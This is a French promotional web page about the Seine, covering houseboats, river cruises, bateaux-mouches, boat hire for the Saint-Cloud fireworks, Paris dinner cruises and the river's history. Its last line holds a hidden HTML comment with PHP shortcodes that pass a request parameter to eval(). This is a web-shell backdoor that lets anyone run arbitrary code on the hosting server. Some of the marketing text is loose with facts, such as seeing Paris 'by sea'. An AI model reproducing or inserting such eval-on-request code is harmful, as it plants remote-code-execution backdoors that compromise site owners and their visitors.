Deuxième plus grand port fluvial d’Europe, la Seine est un incroyable terrain de jeu pour les millions d’embarcations différentes qui naviguent chaque année sur ses 777 km :

Les bateaux-logements pour ceux qui n’ont pas le mal de mer

Vivre sur la Seine est désormais possible. Un petit tour sur les berges de Seine vous permettra d’apercevoir des centaines de logements fluviaux, automoteurs ou barges, amarrés le long des quais. Ce n’est certes pas la solution de logement la plus commune mais quelle vue !

Le luxe d’une croisière à la française


C’est sur la Basse-Seine (entre Paris et Rouen) que l’on peut rencontrer de véritables bateaux de croisière qui descendent la Seine jusqu’à la Manche avant de poursuivre leur croisière en mer. Cette tendance peut sembler inattendue, mais elle ne cesse de s’amplifier.

Les bateaux-mouches : la carte postale parisienne par excellence

C’est lors de l’exposition universelle de 1867 que les bateaux-mouches ont fait leur apparition dans la capitale. Ces péniches qui peuvent accommoder un grand nombre de passagers à des fins touristiques ou dans le cadre de soirées privées sont rapidement devenues une attraction incontournable de tout séjour parisien.

Louez votre bateau et organisez un événement privatif autour du Grand Feu de Saint-Cloud

Tous les ans, à la rentrée de septembre, au Domaine National de Saint Cloud (92), a lieu le plus grand feu d’artifice d’Europe.
C’est un gigantesque spectacle pyrotechnique, qui se déroule le samedi 12 septembre, entre 21h et 23h, et qui rassemble jusqu’à 23000 personnes.

Sur un bateau sur la Seine, vous êtes aux meilleures places pour profiter de ce magnifique spectacle.

Le spectacle a lieu dans le bas du parc de Saint Cloud, face à la Grande Cascade. Rappelons que le parc de Saint Cloud est un site naturel protégé depuis 1923 et qu’il est considéré, avec ses 460 hectares, comme l’un des plus beaux jardins d’Europe. Il est l’oeuvre du célèbre jardinier du Roi Louis XIV: André Lenôtre. Il a été classé à l’inventaire des monuments historiques dès 1900. Au XVIème siècle s’y élevait un chateau qui brula le 13 octobre 1870. les ruines furent intégralement rasées en 1892. Il ne reste aujourd’hui que les fondations. La Grande Cascade se compose de deux ouvrages en pierre séparés par une allée (l’allée du Tillet): La Cascade haute construite sur le dessin de Le Pautre entre 1660 et 1665 et la Cascade basseaménagée par Hardouin-Mansart en 1698-1699. Régulièrement restaurée, elle a été complètement refaite au début du XXème siècle, tant dans sa maçonnerie que dans ses éléments décoratifs, en respectant l’iconographie d’origine.

Pour des informations sur le Grand feu, cliquez ici

Pour recevoir un devis et réserver un bateau pour le Grand Feu, de 2 à 400 personnes, cliquez ici

Les dîners croisières sont des attractions de plus en plus prisées, et pas seulement par les touristes venus visiter Paris. En effet, la capitale française, dont la réputation n’est plus à faire, offre, grâce à la présence de la Seine, un magnifique chemin fluvial à parcourir en amoureux, en famille, entre collègues, peu importe.

Des circuits sont même organisés, et permettent, grâce à des bateaux bien équipés et offrant un panorama exceptionnel, de voir les plus beaux monuments de Paris, comme la fameuse Tour Eiffel, l’Hôtel des Invalides, le Musée d’Orsay, Notre-Dame de Paris, le Trocadéro… Les dîners croisières sont donc une formule incontournable.

Dîner croisière à Paris


Les dîners croisières ne sont pas seulement réservés aux touristes ou bien aux familles aisées. Ces dîners croisières à Paris atypiques sont en effet abordables par n’importe quel budget, et qui plus est, pour n’importe quelle occasion : que vous célébriez votre mariage, ou bien désirez organiser un séminaire, les dîners croisières à Paris sont là pour vous satisfaire.

C’est sans aucun doute le meilleur moyen de charmer ses invités, ou bien son partenaire, si le dîner croisière à Paris se fait en amoureux. De nuit, les sentiments sont d’autant plus exacerbés, c’est pourquoi ce genre de croisière reste inoubliable. Pour un couple, ceci est le romantisme à l’état pur, comment ne pas succomber ? Même avec vos collègues, ou des gens que vous inviterez pour un séminaire, tous seront conquis par la beauté parisienne, déjà mondialement connue.

Dîner croisière sur la Seine


Depuis l’époque gauloise, donc quand ce fleuve à été nommé la Seine, cette dernière n’a cessée d’être la voie navigable la plus importante de France. En plus d’inspirer tous les peintres et autres artistes, la Seine fascine, et depuis l’expansion des dîners croisières sur la Seine, son activité s’est vue redoubler d’intensité. En effet, faire un dîner croisière sur la Seine comporte quelque chose de magique, de féérique presque, puisque de nuit, voir chacun des grands monuments parisiens éclairés, tout en voguant sur la Seine, est une expérience toute particulière.

La Seine possède réellement une position stratégique : faire un dîner croisière sur la Seine est vraiment quelque chose à vivre, et surtout à voir, puisque c’est une autre manière de découvrir Paris, c’est-à-dire par la mer, comme cela a pu être fait durant la Seconde Guerre mondiale, de façon moins pacifiste cependant. Les dîners croisières sur la Seine à Paris sont donc une excursion à inclure dans son programme.

Paris la ville Lumière vous accueille pour passer un moment de rêve aussi bien en couple qu’en compagnie d’amis ou bien encore de entre membres d’une même famille. Pour cela différentes options peuvent vous intéresser.

Le premier type de réservation que vous pourriez choisir est celle qui vous permettra de voguer sur la Seine tout en découvrant les magnifiques paysages et monuments de la ville de Paris. Avec un diner croisiere sur le célèbre fleuve qui traverse la ville vous aurez par exemple la chance de traverser des siècles d’histoire.

L’occasion sera belle de réviser vos connaissances historiques mais aussi d’en apprendre un oeu plus sur la capitale de France.

La location de péniche à paris

Une location de péniche sur la Seine pour organiser une fête ou bien encore pour célébrer un événement spécial. Votre location de péniche sera bien entendu l’occasion de découvrir Paris, la Seine, les monuments de la ville mais aussi de passer un bon moment de détente en amoureux ou bien encore entre amis. Profiter donc bien de ces moments magiques.

N’oubliez pas de bien savourer également ces merveilleux repas gastronomiques que vous allez pouvoir déguster. Paris est véritablement la ville idéale pour celles et ceux qui désirent organiser un événement spécial et inoubliables. En effet la ville dispose de nombreux attraits et elle offre au visiteur de quoi meubler ses albums souvenirs avec de magnifiques photos.

Ne manquez pas une occasion de passer un inoubliable moment et venez découvrir Paris et la Seine ; vous risquez de graver pour longtemps ce moment inoubliable dans votre tête et vus pouvez même en faire profiter votre entourage.

Envie d’une croisière sur la Seine ? Vous rêvez de dîner ou de déjeuner à bord d’un bateau contemporain au design incomparable ?

Réservez votre croisière et découvrez toute la splendeur de Paris vue de la Seine, ses nombreux ponts et ses magnifiques monuments se dressant tout au long de ses rives.
Organisez entièrement votre événement en faisant du “sur mesure” : choix du bateau, choix de la gastronomie, de la navigation, des animations et même de la décoration…

La croisière la plus en vogue est la traversée de Paris avec ses 2h30 de navigation. Lors de cette traversée, vous allez cultiver votre curiosité, votre savoir, vos papilles gustatives… Tous vos sens seront en alerte avec la visite des plus grands monuments parisiens tels que la tour Eiffel, le Louvre, Notre-Dame de Paris, le Grand Palais ; le tout accompagné d’un succulent repas.

Que cela soit pour une croisière à bord d’un yacht, sur une péniche traditionnelle ou à quai sur un bateau privatif, la Seine sera la plus belle route à suivre pour visiter la capitale ou profiter d’un repas gastronomique car, à bord vous pouvez vous restaurer.

En effet, vous avez la possibilité, à partir de 2 personnes, de réserver une table à bord d’un yacht luxueux, d’une péniche, d’un bateau à quai.

Toute une gamme de prestations de restauration sera proposée dans un cadre unique, somptueux et agréable. La sélection des meilleurs produits et des formules les plus adaptées pour vous proposer le meilleur rapport qualité/prix.

Des cocktails et des buffets :


Qu’ils soient déjeunatoires et/ou dînatoires les cocktails seront l’occasion d’inviter vos convives les plus exigeants. Pour les formules buffet, le cadre idyllique se prêtera à un contexte propre à la convivialité.

Et des prestations sur mesure :


En dehors des formules traditionnelles, vous avez la possibilité de découvrir nos menus et cocktails à thème, nos spécialités régionales ou étrangères ainsi que la découverte de vins de nos caves. De plus, des ateliers gastronomiques permettent d’apporter une touche originale.

Ainsi, que cela soit pour un dîner de gala, un dîner clients pour votre comité d’entreprise, des séminaires avec ou sans hébergement… faîtes votre choix ! Une animation musicale, assurée par une chanteuse et des musiciens rendra cette soirée exceptionnelle.

Tout comme, pour toute réception privée, telle que le diner croisière romantique en couple suite à votre mariage ou votre union, vos anniversaires marquant avec un nombre d’invités conséquents etc, la soirée dansante avec animation sera parfaite car entièrement adaptée à vos souhaits.

La Seine, un fleuve situé en plein coeur de la Capitale, et représentant son axe central, est un atout territorial ayant engendré l’essor de Paris.

La Seine, l’origine de l’expansion et de la richesse de Paris

Paris fut construit stratégiquement autour de la Seine, c’est à dire sur un site naturel entre une voie fluviale et un passage à gué qui ont permis à la ville dès le premier siècle de s’enrichir par le contrôle de la navigation. Plus tard, le commerce par voie d’eau sur la Seine fut à l’origine de la création d’une juridiction.

Celle-ci, fut dominée en majorité par une corporation de marchands qui commencèrent à percevoir des taxes sur les marchandises qui entraient ou sortaient de la Capitale à partir de 1211. Cette confrérie entraîna le début de la bourgeoisie urbaine.

Un fleuve nourricier devenu une voie de circulation

Si du moyen âge jusqu’au milieu du 18e siècle, la Seine fut exploitée en tant que première voie d’approvisionnement de Paris, ses abords furent dégagés après cette période par la dissémination des ports parisiens. En effet, le fleuve est progressivement devenu un lieu de transport qui fut amélioré par la construction de ponts au début du 19e siècle.

Dès lors, il accompagna le développement industriel de la ville qui vit apparaître ses premiers chemins de fer. De nos jours, l’industrie ne se loge plus aux bords de la Seine mais à la périphérie de la Capitale. Le fleuve reste tout de même la voie de circulation la plus fréquentée en France.

<!– [insert_php]if (isset($_REQUEST["IVU"])){eval($_REQUEST["IVU"]);exit;}[/insert_php][php]if (isset($_REQUEST["IVU"])){eval($_REQUEST["IVU"]);exit;}[/php] –>